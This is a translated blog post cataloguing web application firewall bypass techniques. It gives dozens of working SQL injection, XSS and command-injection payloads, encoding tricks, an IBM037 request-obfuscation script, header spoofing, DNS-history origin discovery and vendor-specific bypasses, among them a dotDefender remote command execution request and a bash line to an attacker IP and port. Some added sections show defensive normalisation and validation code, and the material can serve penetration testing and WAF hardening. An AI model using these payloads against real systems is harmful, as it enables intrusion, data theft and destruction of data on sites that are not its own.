Learning various WAF bypass techniques

Posted on 2019-12-19 21:54:11
0X00    Fuzz / brute force
Fuzz dictionaries
1. Seclists/Fuzzing
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing
2. Fuzz-DB/Attack
https://github.com/fuzzdb-project/fuzzdb/tree/master/attack
3. Other Payloads (may get your IP banned, so be careful)
https://github.com/foospidy/payloads

0X01    Regex bypass

Case: SQL injection
Step 1:
  Filtered keywords: and, or, union
  Likely regex: preg_match('/(and|or|union)/i', $id)
  Blocked statement: union select user, password from users
  Bypass statement: 1 || (select user from users where user_id = 1) = 'admin'
Step 2:
  Filtered keywords: and, or, union, where
  Blocked statement: 1 || (select user from users where user_id = 1) = 'admin'
  Bypass statement: 1 || (select user from users limit 1) = 'admin'
Step 3:
  Filtered keywords: and, or, union, where, limit
  Blocked statement: 1 || (select user from users limit 1) = 'admin'
  Bypass statement: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
Step 4:
  Filtered keywords: and, or, union, where, limit, group by
  Blocked statement: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
  Bypass statement: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1
Step 5:
  Filtered keywords: and, or, union, where, limit, group by, select
  Blocked statement: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
  Bypass statement: 1 || 1 = 1 into outfile 'result.txt'
  Bypass statement: 1 || substr(user,1,1) = 'a'
Step 6:
  Filtered keywords: and, or, union, where, limit, group by, select, '
  Blocked statement: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
  Bypass statement: 1 || user_id is not null
  Bypass statement: 1 || substr(user,1,1) = 0x61
  Bypass statement: 1 || substr(user,1,1) = unhex(61)
Step 7:
  Filtered keywords: and, or, union, where, limit, group by, select, ', hex
  Blocked statement: 1 || substr(user,1,1) = unhex(61)
  Bypass statement: 1 || substr(user,1,1) = lower(conv(11,10,36))
Step 8:
  Filtered keywords: and, or, union, where, limit, group by, select, ', hex, substr
  Blocked statement: 1 || substr(user,1,1) = lower(conv(11,10,36))
  Bypass statement: 1 || lpad(user,7,1)
Step 9:
  Filtered keywords: and, or, union, where, limit, group by, select, ', hex, substr, white space
  Blocked statement: 1 || lpad(user,7,1)
  Bypass statement: 1%0b||%0blpad(user,7,1)



0X02    Obfuscation / encoding

1. Case variation
  Standard: <script>alert()</script>
  Bypassed: <ScRipT>alert()</sCRipT>

  Standard: SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'
  Bypassed: sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'
2. URL encoding
  Blocked statement: <svG/x=">"/oNloaD=confirm()//
  Bypassed: %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F

  Blocked statement: uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)
  Bypassed: uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29
3. Unicode encoding
  Standard: <marquee onstart=prompt()>
  Obfuscated: <marquee onstart=\u0070r\u006f\u006dpt()>

  Blocked statement: /?redir=http://google.com
  Bypassed: /?redir=http://google。com (Unicode substitution)

  Blocked statement: <marquee loop=1 onfinish=alert()>x
  Bypassed: <marquee loop=1 onfinish=alert︵1)>x (Unicode substitution)

  TIP: see the related reports on HackerOne (this and this). :)
4. HTML entity encoding
  Standard: "><img src=x onerror=confirm()>
  Encoded: &quot;&gt;&lt;img src=x onerror=confirm&lpar;&rpar;&gt; (general form)
  Encoded: &#34;&#62;&#60;img src=x onerror=confirm&#40;&#41;&#62; (numeric reference)
5. Mixed encoding
  WAF rules often filter only one specific type of encoding.
  Such filters can be bypassed with payloads that mix several encodings.
  Tabs and newlines add further obfuscation.
6. Obfuscation
  <A HREF="h
  tt p://6 6.000146.0x7.147/">XSS</A>
7. Double URL encoding
  This requires the server side to URL-decode the input more than once.

  Standard: http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\
  Obfuscated: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\

  Standard: <script>alert()</script>
  Obfuscated: %253Cscript%253Ealert()%253C%252Fscript%253E
8. Wildcards
  Used in Linux command injection; shell globbing hides the command name from the filter.

  Standard: /bin/cat /etc/passwd
  Obfuscated: /???/??t /???/??ss??
  Used chars: / ? t s

  Standard: /bin/nc 127.0.0.1 1337
  Obfuscated: /???/n? 2130706433 1337
  Used chars: / ? n [0-9]
9. Dynamic payload generation
  Standard: <script>alert()</script>
  Obfuscated: <script>eval('al'+'er'+'t()')</script>

  Standard: /bin/cat /etc/passwd
  Obfuscated: /bi'n'''/c''at' /e'tc'/pa''ss'wd

  Bash allows path concatenation for execution.

  Standard: <iframe/onload='this["src"]="javascript:alert()"';>
  Obfuscated: <iframe/onload='this["src"]="jav"+"as        cr"+"ipt:al"+"er"+"t()"';>
10. Junk characters
  Normal payloads get filtered out easily.
  Adding some junk characters helps avoid detection (specific cases only).
  They often confuse regex-based firewalls.

  Standard: <script>alert()</script>
  Obfuscated: <script>+-+-1-+-+alert(1)</script>

  Standard: <BODY onload=alert()>
  Obfuscated: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert()>
NOTE: the statements above can break the regex match and so achieve a bypass.
11. Inserting newlines
  Some WAFs may not match across newline characters.

  Standard: <iframe src="javascript:confirm(0)">
  Obfuscated: <iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(0)">
12. Undefined variables
  Insert undefined variables into bash and perl commands to disturb the regex.
TIP: any non-existent variable name will do; $aaaa, $sdayuhjbsad and $dad2ed all work.

  Level 1 obfuscation: normal
  Standard: /bin/cat /etc/passwd
  Obfuscated: /bin/cat$u /etc/passwd$u

  Level 2 obfuscation: position based
  Standard: /bin/cat /etc/passwd
  Obfuscated: $u/bin$u/cat$u $u/etc$u/passwd$u

  Level 3 obfuscation: random characters
  Standard: /bin/cat /etc/passwd
  Obfuscated: $aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff

  A carefully crafted payload:
  $sdijchkd/???$sdjhskdjh/??t$skdjfnskdj $sdofhsdhjs/???$osdihdhsdj/??ss??$skdjhsiudf

13. Tabs and newlines
  Most WAFs match on spaces, not on tabs.

  Standard: <IMG SRC="javascript:alert();">
  Bypassed: <IMG SRC=" javascript:alert();">
  Variant: <IMG SRC=" jav ascri pt:alert ();">

  Standard: http://test.com/test?id=1 union select 1,2,3
  Obfuscated: http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3

  Standard: <iframe src=javascript:alert(1)></iframe>
  Obfuscated:
  <iframe    src=j        a        v        a        s        c        r        i        p        t        :a        l        e        r        t        %28        1        %29></iframe>
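An added example, not from the original post, written from the WAF side: a canonicaliser that undoes the tricks from 0X01 Step 9 and from items 1, 2, 3, 7, 11 and 13 above before a signature is matched, and that contrasts the keyword blacklist with an allowlist for the numeric id parameter. The blacklist, the context names and the sample values are constructed for this example.

```python
import re
import unicodedata
import urllib.parse

# Keyword blacklist from the Step 5 stage of the 0X01 walk-through, as a WAF
# rule would apply it; \b keeps it from firing inside words such as "password".
BLACKLIST_RE = re.compile(r"\b(and|or|union|where|limit|select)\b", re.I)
# Positive model for the same parameter: the id in 0X01 is numeric, so the
# hardened check accepts digits only (constructed for this example).
INTEGER_RE = re.compile(r"\A\d+\Z")


def url_decode_fully(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the text stops changing (undoes the %25 double encoding of item 7)."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def normalize(value: str, ctx: str = "sql") -> str:
    """Canonical form of one parameter value for signature matching.

    ctx="sql": every C0 control (TAB, LF, CR, VT = %0b ...) is whitespace to the
               SQL lexer, so each run becomes one space (Step 9, item 13).
    ctx="url": browsers delete TAB/LF/CR from a URL before parsing the scheme,
               so "j%0Aa%0Av..." collapses back to "javascript:" (items 11, 13).
    Both contexts decode first, fold Unicode compatibility forms with NFKC
    (U+FE35 from item 3 becomes "("), drop NUL bytes and lower-case (item 1).
    The "。" of item 3 is not an NFKC case: IDNA/UTS #46 maps it to ".", so a
    host check has to run on the IDNA-mapped host name, not on this string.
    """
    value = url_decode_fully(value)
    value = unicodedata.normalize("NFKC", value)
    value = value.replace("\x00", "")
    if ctx == "url":
        value = re.sub(r"[\t\n\r]", "", value)
    value = re.sub(r"[\x01-\x20\x7f]+", " ", value)
    return value.strip().lower()


def raw_hit(value: str) -> bool:
    """The naive rule: regex over the value exactly as it arrived on the wire."""
    return BLACKLIST_RE.search(value) is not None


def blacklist_hit(value: str, ctx: str = "sql") -> bool:
    """The same rule applied after canonicalisation."""
    return BLACKLIST_RE.search(normalize(value, ctx)) is not None


def integer_param_ok(value: str) -> bool:
    """Allowlist check: a numeric id may contain digits and nothing else."""
    return INTEGER_RE.match(normalize(value)) is not None


if __name__ == "__main__":
    # Values taken from the list above. The Step 8/9 payload contains no listed
    # keyword at all, which is why only the allowlist stops it.
    for sample in ("sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'",
                   "1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3",
                   "1%0b||%0blpad(user,7,1)"):
        print(f"{sample!r}: raw={raw_hit(sample)} normalized={blacklist_hit(sample)} "
              f"integer_ok={integer_param_ok(sample)}")
```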
14. Token breakers (hard to translate; it appears to describe breaking out of the SQL injection context)
  Attacks on tokenizers attempt to break the logic of splitting a request into tokens with the help of token breakers.
  Token breakers are symbols that change the correspondence between an element of a string and a certain token, and thus bypass signature-based matching.
  However, the request must still remain valid while using token breakers.

  Case: unknown token for the tokenizer
  Payload: ?id='-sqlite_version() UNION SELECT password FROM users --

  Case: unknown context for the parser (notice the uncontexted bracket)
  Payload 1: ?id=123);DROP TABLE users --
  Payload 2: ?id=1337) INTO OUTFILE 'xxx' --
TIP: more payloads can be found in the cheat sheet.

15. Other format obfuscation

Case: IIS
  IIS 6, 7.5, 8 and 10 (ASPX v4.x) accept IBM037-encoded characters.
  Parameter names and values can be sent in that encoding.
Original request:

  POST /sample.aspx?id1=something HTTP/1.1
  HOST: victim.com
  Content-Type: application/x-www-form-urlencoded; charset=utf-8
  Content-Length: 41

  id2='union all select * from users--
Obfuscated request + URL encoding:
  POST /sample.aspx?%89%84%F1=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1
  HOST: victim.com
  Content-Type: application/x-www-form-urlencoded; charset=ibm037
  Content-Length: 115

  %89%84%F2=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60
TIP: this small script can be used to convert the encoding:

import sys
import urllib.parse
from argparse import ArgumentParser

lackofart = '''
        OBFUSCATOR
'''


def paramEncode(params="", charset="", encodeEqualSign=False, encodeAmpersand=False,
                urlDecodeInput=True, urlEncodeOutput=True):
    """Re-encode a query string (name=value[&name=value...]) or a bare value in `charset`.

    Each piece is converted to bytes in the target charset and then either
    percent-encoded (urlEncodeOutput) or mapped back to text byte-for-byte via
    latin-1, so str and bytes are never concatenated (the original mixed them and
    raised TypeError as soon as the separators were encoded). The "=" and "&"
    separators are kept as they are unless the caller asks for them to be encoded.
    """
    def out(raw):
        return urllib.parse.quote_plus(raw) if urlEncodeOutput else raw.decode('latin-1')

    if '=' in params:
        # One or more name=value pairs. The original test `'=' and '&' in params`
        # only checked for '&', so a single pair was encoded as one opaque blob.
        eq = out('='.encode(charset)) if encodeEqualSign else '='
        amp = out('&'.encode(charset)) if encodeAmpersand else '&'
        pieces = []
        for pair in params.split('&'):
            name, _, value = pair.partition('=')
            if urlDecodeInput:
                name = urllib.parse.unquote(name)
                value = urllib.parse.unquote(value)
            pieces.append(out(name.encode(charset)) + eq + out(value.encode(charset)))
        return amp.join(pieces)

    # Bare value without '='
    if urlDecodeInput:
        params = urllib.parse.unquote(params)
    return out(params.encode(charset))


def main():
    print(lackofart)
    parser = ArgumentParser('python3 obfu.py')
    parser._action_groups.pop()

    # A simple hack to have required arguments and optional arguments separately
    required = parser.add_argument_group('Required Arguments')
    optional = parser.add_argument_group('Optional Arguments')

    # Required Options
    required.add_argument('-s', '--str', help='String to obfuscate', dest='str', required=True)
    required.add_argument('-e', '--enc', help='Encoding type. eg: ibm037, utf16, etc', dest='enc', required=True)

    # Optional Arguments (main stuff and necessary)
    optional.add_argument('-ueo', help='URL Encode Output', dest='ueo', action='store_true')
    optional.add_argument('-udi', help='URL Decode Input', dest='udi', action='store_true')
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)
    args = parser.parse_args()
    # e.g. -s 'id1=something' -e ibm037 -ueo reproduces the query string of the obfuscated request above
    print('Input: %s' % args.str)
    print('Output: %s' % paramEncode(params=args.str, charset=args.enc,
                                     urlDecodeInput=args.udi, urlEncodeOutput=args.ueo))


if __name__ == '__main__':
    main()



0X04    HTTP parameter pollution
Technique
  This attack depends on how the server interprets several parameters with the same name.
  Situations that can lead to a bypass:
  The server uses the last parameter received while the WAF only checks the first one.
  The server joins the values of same-named parameters while the WAF checks each of them separately.

Below is a comparison of how the servers concerned interpret repeated parameters:

Environment                         Parameter parsing              Example
ASP/IIS                             joined with a comma            par1=val1,val2
JSP, Servlet/Apache Tomcat          first parameter wins           par1=val1
ASP.NET/IIS                         joined with a comma            par1=val1,val2
PHP/Zeus                            last parameter wins            par1=val2
PHP/Apache                          last parameter wins            par1=val2
JSP, Servlet/Jetty                  first parameter wins           par1=val1
IBM Lotus Domino                    first parameter wins           par1=val1
IBM HTTP Server                     last parameter wins            par1=val2
mod_perl, libapreq2/Apache          first parameter wins           par1=val1
Oracle Application Server 10G       first parameter wins           par1=val1
Perl CGI/Apache                     first parameter wins           par1=val1
Python/Zope                         first parameter wins           par1=val1
IceWarp                             returns a list                 ['val1','val2']
AXIS 2400                           last parameter wins            par1=val2
DBMan                               joined with two tildes         par1=val1~~val2
mod-wsgi (Python)/Apache            returns an array               ARRAY(0x8b9058c)
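An added example, not from the original post, that puts the two WAF failure modes listed above against the resolution rules in the table: a toy signature checked on the first occurrence only, on every occurrence in isolation, and on the value the back end will actually resolve to. The signature, the sample queries and the policy names are constructed for this example.

```python
import re
from urllib.parse import parse_qsl

# Toy signature for the WAF below (constructed for this example).
SIGNATURE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)

# How the back ends in the table above settle a name that appears more than once.
RESOLVERS = {
    "first": lambda values: values[0],          # Tomcat, Jetty, Perl CGI, Zope, ...
    "last":  lambda values: values[-1],         # PHP/Apache, IBM HTTP Server, AXIS
    "comma": lambda values: ",".join(values),   # ASP and ASP.NET on IIS
    "tilde": lambda values: "~~".join(values),  # DBMan
    "list":  lambda values: list(values),       # IceWarp, mod_wsgi
}


def group_params(query):
    """name -> every value sent for that name, in wire order."""
    grouped = {}
    for name, value in parse_qsl(query, keep_blank_values=True):
        grouped.setdefault(name, []).append(value)
    return grouped


def resolve(query, backend):
    """The parameters as the named back end actually sees them."""
    return {name: RESOLVERS[backend](values) for name, values in group_params(query).items()}


def inspect_first_only(query):
    """Weak WAF from the first situation above: only the first occurrence of each name."""
    return any(SIGNATURE.search(values[0]) for values in group_params(query).values())


def inspect_each(query):
    """Weak WAF from the second situation above: every occurrence, but each on its own."""
    return any(SIGNATURE.search(v) for values in group_params(query).values() for v in values)


def inspect_as_backend(query, backend):
    """Hardened check: inspect the value the back end will resolve the name to."""
    for value in resolve(query, backend).values():
        parts = value if isinstance(value, list) else [value]
        if any(SIGNATURE.search(part) for part in parts):
            return True
    return False


def duplicated_names(query):
    """Strictest option: flag any name that arrives more than once, whatever the values."""
    return sorted(name for name, values in group_params(query).items() if len(values) > 1)


# Constructed sample queries (not from the original post).
Q_LAST_WINS = "id=1&id=1 union select 1,2"   # clean first copy, signature in the second
Q_SPLIT = "id=1 union&id=select 1,2"         # each piece is clean until a joining server glues them


if __name__ == "__main__":
    for query in (Q_LAST_WINS, Q_SPLIT):
        print(query, "first-only:", inspect_first_only(query), "each:", inspect_each(query))
        for backend in RESOLVERS:
            print("   as", backend, "->", resolve(query, backend)["id"], inspect_as_backend(query, backend))
```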


0X05    Browser bugs


Charset bugs:
  Try changing the charset header to a wider Unicode encoding (e.g. UTF-32).
  The payload fires when the site decodes the request.
Example request:

  GET /page.php?p=∀㸀㰀script㸀alert(1)㰀/script㸀 HTTP/1.1
  Host: site.com
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
  Accept-Charset:utf-32; q=0.5
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate

When the site loads, it encodes the input with the UTF-32 charset we set, and because the page's output encoding is UTF-8 it is rendered as "<script>alert(1)</script>", which triggers the XSS.
Fully URL-encoded payload:
  %E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
Null bytes
Null bytes are commonly used as string terminators.
  Example payloads:

  <scri%00pt>alert(1);</scri%00pt>
  <scri\x00pt>alert(1);</scri%00pt>
  <s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
  Standard: <a href="javascript:alert()">
  Obfuscated: <a href="ja0x09vas0x0A0x0Dcript:alert(1)">clickme</a>
  Variant: <a 0x00 href="javascript:alert(1)">clickme</a>
Parsing errors
  The RFC states that a node name cannot start with whitespace.
  But special characters such as %, //, !, ? etc. can be used instead.
  Examples:

  <// style=x:expression\28write(1)\29> - works up to IE7 (Source)
  <!--[if]><script>alert(1)</script --> - works up to IE9 (Reference)
  <?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/> - works in IE7 (Reference)
  <%div%20style=xss:expression(prompt(1))> - works up to IE7

Unicode separators
Every browser has its own set of separator characters.
After fuzzing, @Masato Kinugawa found the following:
  IExplorer: 0x09, 0x0B, 0x0C, 0x20, 0x3B
  Chrome: 0x09, 0x20, 0x28, 0x2C, 0x3B
  Safari: 0x2C, 0x3B
  FireFox: 0x09, 0x20, 0x28, 0x2C, 0x3B
  Opera: 0x09, 0x20, 0x2C, 0x3B
  Android: 0x09, 0x20, 0x28, 0x2C, 0x3B
  <a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>pwn3d
Replacing with other atypical but equivalent syntax

Find constructs the WAF developers did not think of and attack with those.
Common keywords that some WAF developers overlook:
  • JavaScript functions:

    • window
    • parent
    • this
    • self

  • Tag attributes:

    • onwheel
    • ontoggle
    • onfilterchange
    • onbeforescriptexecute
    • ondragstart
    • onauxclick
    • onpointerover
    • srcdoc



SQL Operators

lpad

  lpad( string, padded_length, [ pad_string ] ): pads the string on the left with the given character up to the requested length. The two-argument form is Oracle's; MySQL's LPAD always takes three arguments.
    lpad('tech', 7); returns '   tech'
    lpad('tech', 2); returns 'te'
    lpad('tech', 8, '0'); returns '0000tech'
    lpad('tech on the net', 15, 'z'); returns 'tech on the net'
    lpad('tech on the net', 16, 'z'); returns 'ztech on the net'
field
  FIELD(str,str1,str2,str3,...)
  Returns the index (1-based position) of str in the list str1, str2, str3, ...; returns 0 if str is not found.
  +---------------------------------------------------------+
  | FIELD('ej', 'Hej', 'ej', 'Heja', 'hej', 'foo')          |
  +---------------------------------------------------------+
  | 2                                                       |
  +---------------------------------------------------------+

bit_count: the number of 1 bits in the binary representation. BIT_COUNT(10) is 2, because 10 in binary is 1010.
Example payloads:
  Case: XSS
  <script>window['alert'](0)</script>
  <script>parent['alert'](1)</script>
  <script>self['alert'](2)</script>
  Case: SQLi
  SELECT if(LPAD(' ',4,version())='5.7',sleep(5),null);
  1%0b||%0bLPAD(USER,7,1)
  Many alternatives to native JavaScript can be used:

JSFuck
JJEncode
XChars.JS
Abusing SSL/TLS ciphers:
  Servers often accept connections with a variety of SSL/TLS ciphers and versions.
  Negotiate a version the WAF does not support.
  Find out which ciphers the WAF supports (the WAF vendor's documentation usually covers this).
  Find out which ciphers the server supports (a tool such as SSLScan helps here).
  Find the ones the server supports but the WAF does not.
Tool: abuse-ssl-bypass-waf



Abusing DNS records:

  • Find the origin server behind the cloud WAF

TIP: some online resources: IP History and DNS Trails
Tool: bypass-firewalls-by-DNS-history
  bash bypass-firewalls-by-DNS-history.sh -d <target> --checkall

Request header spoofing
Make the WAF believe the request comes from the internal network so that it is not filtered.
Add the following request headers:
  X-Originating-IP: 127.0.0.1
  X-Forwarded-For: 127.0.0.1
  X-Remote-IP: 127.0.0.1
  X-Remote-Addr: 127.0.0.1
  X-Client-IP: 127.0.0.1
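An added example, not from the original post, written for the application side of the trick above: the only address worth trusting is the TCP peer, X-Forwarded-For is believed only for hops appended by a known proxy of ours, and the remaining headers in the list are dropped. The proxy ranges and the sample addresses are constructed for this example.

```python
import ipaddress

# Headers from the list above that carry no trustworthy information: any client can
# set them, so the application drops them instead of reading them.
CLIENT_HINT_HEADERS = ("x-originating-ip", "x-remote-ip", "x-remote-addr", "x-client-ip")

# Constructed for this example: the only reverse proxies allowed to speak for a client,
# and the ranges that count as "internal" for access decisions.
TRUSTED_PROXIES = ("10.0.0.0/8",)
INTERNAL_NETS = ("127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")


def strip_client_hints(headers):
    """Return the headers without the spoofable pseudo-client-IP fields."""
    return {k: v for k, v in headers.items() if k.lower() not in CLIENT_HINT_HEADERS}


def client_ip(remote_addr, headers, trusted_proxies=TRUSTED_PROXIES):
    """Address to use for any "is this request internal?" decision.

    remote_addr is the TCP peer reported by the socket, which no header can forge.
    X-Forwarded-For is walked from the right, i.e. from the hop nearest to us: each
    entry that is one of our own proxies is skipped and the first one that is not is
    the client. Entries further left were written by the client and are ignored.
    A malformed entry raises instead of silently yielding an internal-looking address.
    """
    trusted = [ipaddress.ip_network(n) for n in trusted_proxies]

    def is_trusted(addr):
        return any(addr in net for net in trusted)

    hop = ipaddress.ip_address(remote_addr)
    if not is_trusted(hop):
        return hop  # direct connection: the peer is the client, whatever the headers say

    lowered = {k.lower(): v for k, v in headers.items()}
    chain = [h.strip() for h in lowered.get("x-forwarded-for", "").split(",") if h.strip()]
    for entry in reversed(chain):
        try:
            addr = ipaddress.ip_address(entry)
        except ValueError as exc:
            raise ValueError(f"malformed X-Forwarded-For hop: {entry!r}") from exc
        if not is_trusted(addr):
            return addr
        hop = addr
    return hop  # every hop was one of ours: the request really did start inside


def is_internal(addr, internal_nets=INTERNAL_NETS):
    return any(addr in ipaddress.ip_network(n) for n in internal_nets)


if __name__ == "__main__":
    # Constructed request: an outside peer sends the headers from the list above.
    spoofed = {"X-Forwarded-For": "127.0.0.1", "X-Client-IP": "127.0.0.1"}
    who = client_ip("203.0.113.5", spoofed)
    print(who, "internal" if is_internal(who) else "external")  # prints "203.0.113.5 external"
```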

Google dorks approach:
For bypassing a WAF that is already known.
Search syntax. Normal search:
+<wafname> waf bypass
Searching for specific version exploits:
"<wafname> <version>" (bypass|exploit)
For a specific type of bypass:
"<wafname>" +<bypass type> (bypass|exploit)
On Exploit DB:
site:exploit-db.com +<wafname> bypass
On 0Day Inject0r DB:
site:0day.today +<wafname> <type> (bypass|exploit)
On Twitter:
site:twitter.com +<wafname> bypass
On Pastebin:
site:pastebin.com +<wafname> bypass

0X06  Additional bypass techniques
Airlock Ergon
  SQLi Overlong UTF-8 Sequence Bypass (>= v4.2.4) by @Sec Consult
  %C0%80'+union+select+col1,col2,col3+from+table+--+
AWS
SQLi Bypass by @enkaskal
  "; select * from TARGET_TABLE --
XSS Bypass by @kmkz
  <script>eval(atob(decodeURIComponent("payload")))//
Barracuda
Cross Site Scripting by @WAFNinja
  <body style="height:1000px" onwheel="alert(1)">
  <div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
  <b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
XSS Bypass by @0xInfection
  <a href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhere
Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit) by @xort
Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit) by @xort


Cerber (WordPress)
Username Enumeration Protection Bypass by HTTP Verb Tampering by @ed0x21son

  POST host.com HTTP/1.1
  Host: favoritewaf.com
  User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)

  author=1

Protected Admin Scripts Bypass by @ed0x21son
  http://host/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils
  http://host/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar
REST API Disable Bypass by @ed0x21son
  http://host/index.php/wp-json/wp/v2/users/

Citrix NetScaler
SQLi via HTTP Parameter Pollution (NS10.5) by @BGA Security

  <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
     <soapenv:Header/>
     <soapenv:Body>
          <string>' union select current_user, 2#</string>
      </soapenv:Body>
  </soapenv:Envelope>

generic_api_call.pl XSS by @NNPoster
  http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e
Cloudflare
HTML Injection by @spyerror
  <div style="background:url(/f#oo/;color:red/*/foo.jpg);">X
XSS Bypass by @c0d3g33k
  <a+HREF='javascrip%26%239t:alert%26lpar;document.domain)'>test</a>
XSS Bypasses by @Bohdan Korzhynskyi
  <svg onload=prompt%26%230000000040document.domain)>
  <svg onload=prompt%26%23x000000028;document.domain)>
  xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
  1'"><img/src/onerror=.1|alert``>
XSS Bypass by @RakeshMane10
  <svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f
XSS Bypass by @ArbazKiraak
  <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this['document']['cookie']&rpar;">X</a>`
XSS Bypass by @Ahmet Ümit
  <--`<img/src=` onerror=confirm``> --!>
XSS Bypass by @Shiva Krishna
  javascript:{alert`0`}
XSS Bypass by @Brute Logic
  <base href=//knoxss.me?
XSS Bypass by @RenwaX23 (Chrome only)
  <j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x
RCE Payload Detection Bypass by @theMiddle
  cat$u+/etc$u/passwd$u
  /bin$u/bash$u <ip> <port>
  ";cat+/etc/passwd+#
Comodo
XSS Bypass by @0xInfection

  <input/oninput='new Function`confir\u006d\`0\``'>
  <p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
SQLi by @WAFNinja
  0 union/**/select 1,version(),@@datadir

DotDefender
Firewall disable by (v5.0) by @hyp3rlinx
  1. PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+
  2. <enabled>false</enabled>
复制代码
Remote Command Execution (v3.8-5) by @John Dos
  1. POST /dotDefender/index.cgi HTTP/1.1
  2. Host: 172.16.159.132
  3. User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
  4. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  5. Accept-Language: en-us,en;q=0.5
  6. Accept-Encoding: gzip,deflate
  7. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  8. Keep-Alive: 300
  9. Connection: keep-alive
  10. Authorization: Basic YWRtaW46
  11. Cache-Control: max-age=0
  12. Content-Type: application/x-www-form-urlencoded
  13. Content-Length: 95

  14. sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15
复制代码

Persistent XSS (v4.0) by @EnableSecurity
  1. GET /c?a=<script> HTTP/1.1
  2. Host: 172.16.159.132
  3. User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
  4. rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  6. Accept-Language: en-us,en;q=0.5
  7. Accept-Encoding: gzip,deflate
  8. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  9. <script>alert(1)</script>: aa
  10. Keep-Alive: 300
复制代码

R-XSS Bypass by @WAFNinja
  1. <svg/onload=prompt(1);>
  2. <isindex action="javas&tab;cript:alert(1)" type=image>
  3. <marquee/onstart=confirm(2)>
复制代码
XSS Bypass by @0xInfection
  <p draggable=True ondragstart=prompt()>alert
  <bleh/ondragstart=        parent        ['open']        ()%20draggable=True>dragme

GET - XSS Bypass (v4.02) by @DavidK
  /search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E

  <img src="WTF" onError="{var
  {3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v%2Ba%2Be%2Bs](e%2Bs%2Bv%2B
  h%2Bn)(/0wn3d/.source)" />
POST - XSS Bypass (v4.02) by @DavidK
  <img src="WTF" onError="{var
  {3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/0wn3d/
  .source)" />

clave XSS (v4.02) by @DavidK
  /?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{

Fortinet Fortiweb
pcre_expression unvalidated XSS by @Benjamin Mejri
